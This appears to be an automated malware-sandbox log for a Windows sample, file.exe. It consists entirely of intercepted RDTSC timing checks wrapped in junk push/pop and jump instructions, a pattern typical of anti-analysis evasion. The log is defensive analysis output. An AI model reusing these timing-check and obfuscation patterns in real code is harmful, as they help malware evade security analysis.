Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6377FE second address: 637840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Fh 0x00000007 ja 00007FA6C4C2AB36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007FA6C4C2AB4Fh 0x00000015 push edi 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6379F0 second address: 6379F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637BA2 second address: 637BD5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4C2AB48h 0x0000000d jmp 00007FA6C4C2AB43h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637BD5 second address: 637BDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637BDB second address: 637BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D1B second address: 637D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D24 second address: 637D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D2A second address: 637D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D30 second address: 637D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA6C4C2AB3Fh 0x00000010 je 00007FA6C4C2AB3Eh 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D54 second address: 637D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D5C second address: 637D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6397F9 second address: 6397FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6397FD second address: 63980B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63980B second address: 63980F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63980F second address: 639841 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FA6C4C2AB44h 0x0000000f jmp 00007FA6C4C2AB40h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C31F second address: 63C323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C323 second address: 63C327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C327 second address: 63C333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C333 second address: 63C337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63DA9D second address: 63DAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63DAA1 second address: 63DABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB45h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6428E1 second address: 6428E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6428E7 second address: 6428FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FA6C4C2AB36h 0x0000000d jbe 00007FA6C4C2AB36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6428FA second address: 642917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642917 second address: 642950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FA6C4C2AB44h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642950 second address: 642956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642A64 second address: 642A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642A6B second address: 642A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642A72 second address: 642A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 643605 second address: 643624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007FA6C4D39094h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 643624 second address: 643628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 643628 second address: 643634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 644443 second address: 644487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA6C4C2AB49h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4C2AB3Fh 0x00000011 jmp 00007FA6C4C2AB45h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 644487 second address: 64448B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64448B second address: 6444AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB46h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C4AD second address: 64C4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA6C4D39095h 0x0000000b jmp 00007FA6C4D3908Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6C4D3908Ch 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C64F second address: 64C660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C660 second address: 64C66F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FA6C4D39086h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C901 second address: 64C91C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA6C4C2AB41h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CF2E second address: 64CF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6526B7 second address: 6526CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FA6C4C2AB36h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6526CE second address: 6526D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652B15 second address: 652B4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FA6C4C2AB38h 0x00000012 pushad 0x00000013 jmp 00007FA6C4C2AB3Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6C4C2AB3Eh 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652B4B second address: 652B70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Dh 0x00000007 jmp 00007FA6C4D3908Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FA6C4D39086h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652CC8 second address: 652CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA6C4C2AB36h 0x0000000a jmp 00007FA6C4C2AB41h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652CE3 second address: 652CE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530B7 second address: 6530BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530BB second address: 6530DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA6C4D3909Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530DD second address: 6530F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB3Eh 0x00000009 jnc 00007FA6C4C2AB36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530F5 second address: 6530F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65428E second address: 654292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654292 second address: 654298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654298 second address: 6542A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652227 second address: 65222B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65222B second address: 65222F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65222F second address: 652248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B478 second address: 65B47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B47C second address: 65B482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B482 second address: 65B489 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AEDD second address: 65AEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AEE1 second address: 65AEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B079 second address: 65B081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B081 second address: 65B086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B086 second address: 65B0A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D3908Eh 0x00000008 jns 00007FA6C4D39086h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FA6C4D3908Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B0A7 second address: 65B0AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B0AB second address: 65B0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B1E7 second address: 65B1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA6C4C2AB36h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B1F4 second address: 65B1FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B1FB second address: 65B203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D93F second address: 65D945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D945 second address: 65D94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D94C second address: 65D951 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D951 second address: 65D95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D95E second address: 65D973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FA6C4D39086h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66798A second address: 667994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 667514 second address: 667531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4D39094h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 667531 second address: 667535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 667535 second address: 667541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6676BE second address: 6676C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6676C2 second address: 6676C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B685 second address: 66B690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B690 second address: 66B694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B818 second address: 66B81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B81C second address: 66B83F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FA6C4D39086h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B83F second address: 66B849 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4C2AB36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671FFD second address: 67201F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4D39094h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6F34 second address: 5A6F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6F4E second address: 5A6F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA6C4D3908Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FA6C4D39091h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jnp 00007FA6C4D39086h 0x0000001f jmp 00007FA6C4D39098h 0x00000024 popad 0x00000025 push edi 0x00000026 pushad 0x00000027 popad 0x00000028 pop edi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68398A second address: 68399E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA6C4C2AB3Ch 0x0000000e jbe 00007FA6C4C2AB36h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68399E second address: 6839A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6839A4 second address: 6839AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA6C4C2AB36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6839AE second address: 6839B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682388 second address: 682394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA6C4C2AB36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682394 second address: 68239D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68239D second address: 6823A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6824E8 second address: 682506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4D39091h 0x0000000c jns 00007FA6C4D39086h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682828 second address: 682830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682B33 second address: 682B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682B37 second address: 682B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA6C4C2AB47h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682B58 second address: 682B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68624E second address: 686258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA6C4C2AB36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687BC5 second address: 687BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
